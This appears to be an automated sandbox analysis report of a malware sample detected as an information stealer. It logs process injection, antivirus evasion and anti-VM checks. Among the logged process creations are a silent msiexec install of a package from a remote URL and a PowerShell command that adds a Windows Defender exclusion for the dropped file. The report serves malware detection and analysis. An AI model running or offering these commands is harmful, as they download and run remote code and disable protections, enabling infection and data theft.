              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\Hueta.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5325Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4240Jump to behavior
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIE1FD.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gr0D62WdkfOXqpbHbRHpJump to dropped file
              Source: C:\Windows\System32\msiexec.exe TID: 5200Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\System32\cmd.exe TID: 4872Thread sleep time: -90000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\SysWOW64\expand.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: chrome.exe, 00000000.00000002.1952278977.00000166840CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor3+f
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual ProcessorHINE
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitiondll
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1952278977.00000166840B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
              Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitionl
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes7
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisort
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
              Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=2
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipes
              Source: chrome.exe, 00000000.00000002.1952278977.00000166840CF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
              Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processormuis
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorsyss
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
              Source: Hueta.exe, 0000001C.00000002.1636324703.0000020D26D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
              Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V srqqnintjgmhtmg BusXS
              Source: chrome.exe, 00000000.00000002.1952278977.00000166840F1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V srqqnintjgmhtmg Bus Pipes
              Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Serviceb
              Source: 0xBKHFISYHPX.exe, 00000019.00000000.1613205512.00007FF70A42C000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: vmware
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
              Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes\f%
              Source: chrome.exe, 00000000.00000002.1952278977.000001668410D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionH
              Source: chrome.exe, 00000000.00000002.1952278977.00000166840B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
              Source: 0xBKHFISYHPX.exe, 00000019.00000000.1613205512.00007FF70A42C000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: bad conversionvirtualvmwareoracleinnotekAuthenticAMDGenuineIntelManufacturerselect * from Win32_BIOSSMBIOSBIOSVersion\\?\c:\
              Source: chrome.exe, 00000000.00000002.1952278977.0000016684080000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition`f1
              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe"
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe"Jump to behavior
              Creates a thread in another existing process (thread injection)
              Source: C:\Windows\System32\cmd.exeThread created: unknown EIP: 87610000Jump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeSection loaded: NULL target: C:\Windows\System32\cmd.exe protection: readonlyJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeThread register set: target process: 4352Jump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\System32\cmd.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 16687610000Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec /i https://kolepti.com/flare.msi /qnJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
              Source: chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmpBinary or memory string: Shell_TrayWnd
              Source: chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmpBinary or memory string: Progman
              Source: chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmpBinary or memory string: RProgram Manager
              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4111.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.22621.4036.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4111.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-US~10.0.22621.3958.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exeCode function: 25_0_00007FF708FFE218 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,25_0_00007FF708FFE218
              Source: C:\Windows\SysWOW64\expand.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Aurotun Stealer
              Source: Yara matchFile source: 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
